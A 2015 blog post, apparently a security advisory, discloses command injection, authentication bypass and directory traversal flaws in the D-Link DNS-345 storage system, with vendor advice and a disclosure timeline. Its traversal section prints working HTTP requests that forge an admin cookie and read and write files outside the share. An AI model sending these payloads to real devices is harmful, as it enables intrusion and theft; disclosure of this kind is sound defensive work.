Wednesday, January 21, 2015

[Exploit] D-Link DNS-345 Network Storage System

D-Link DNS-345 Network Storage System
Note: CVE-2014-2691 and CVE-2014-2692 are used in my N.A.S.ty Worm

Vulnerability: Command Injection
CVE: CVE-2014-2691

Description
The D-Link DNS-345 network storage system is susceptible to several command injection attacks, which allows an attacker to inject and execute arbitrary system commands. ISE created a proof of concept that when executed, grants an attacker full administrative control of the affected system.

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-2692 Bypasses Auth.)
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
This is an authenticated vulnerability, but if used in conjunction with a Missing Function Level Access Control vulnerability (below), a remote adversary can call the “/cgi-bin/system_mgr.cgi” program without authentication. This ultimately results in unauthenticated OS command injection attack, which is demonstrated in the stand alone proof of concept exploit and N.A.S.ty worm.

This exploit should work against other D-Link Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Avoid calling shell commands when possible
- If an API does not exist, sanitize user input before passing it to a function or class method that executes system commands.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/dlink_dns345_cve2014_2691.c




Vulnerability: Missing Function Level Access Control (Authentication Bypass)
CVE: CVE-2014-2692

Description
The D-Link DNS-345 network storage system is susceptible to Missing Function Level Access Control (Authentication Bypass) attacks, which ultimately allows an attacker to arbitrarily call system functionality without first authenticating with the system.

Additionally, the cookie based authentication mechanism utilized by D-Link storage systems is severely broken and insecure. For example, D-Link uses an authentication cookie  named “username” with the value set to the username of the newly authenticated user. This is cryptographically insecure, and allows an adversarial user to hijack an authenticated session by guessing valid usernames of authenticated users.

Attack Requirements
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
- This vulnerability should be present in other D-Link Network Storage Systems.
- The missing function level access control (Auth Bypass) and broken session management vulnerability should be split into two distinct issues. For clerical reasons, they have been combined into one vulnerability.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Developers should be performing server-side authentication and authorization checks on all system resources.
- Proper session management should be utilized. Cookie values should be randomly generated using a secure generator.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- CVE-2014-2692 is demonstrated in conjunction with CVE-2014-2691 - https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/dlink_dns345_cve2014_2691.c




Vulnerability: Multiple Directory Traversal Vulnerabilities
CVE: CVE-2014-2693

Description
The D-Link DNS-345 network storage system is susceptible to Directory Traversal attacks, which ultimately allows an attacker to assume full control of the affected system by writing to and reading from arbitrary file system locations.

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-2692 Bypasses Auth.)
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other D-Link Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Developers should refrain from using user supplied input in calls to the file system
- Developers should perform path canonicalization
- Properly configure network services.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- The following HTTP requests show how an attacker can read and write to the D-Link DNS-345 filesystem. Remember, while calls to “webfile_mgr.cgi require authentication”, an attacker can circumvent this by utilizing methods described by CVE-2014-2692.

—File Upload—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.33/web/web_file/web_file_server_main.html
Content-Length: 95
Cookie: username=admin
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

cmd=cgi_folder_content&page=1&rp=10&query=&qtype=&f_field=false&used_dir=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f


POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.33/web/web_file/web_file_server.html
Content-Length: 53
Cookie: username=admin
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

cmd=chk_file&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f&name=dlink.html



—File Download—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.33/web/web_file/web_file_server.html
Content-Length: 111
Cookie: username=admin
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

cmd=cgi_compress&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&type=Folder&name=php&os=UNIX



POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.33/web/web_file/web_file_server_main.html
Cookie: username=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 194

cmd=cgi_download&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&path1=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fphp&name=php&type=Folder&browser=f&os=UNIX





Disclosure Timeline
- CVE Numbers Assigned - 4/03/2014
- Vendor Notified - 8/19/2014
- Public Disclosure (no vendor response) - 1/21/2015

Credit
- Discovered By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators
- Exploited By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators

No comments:

Post a Comment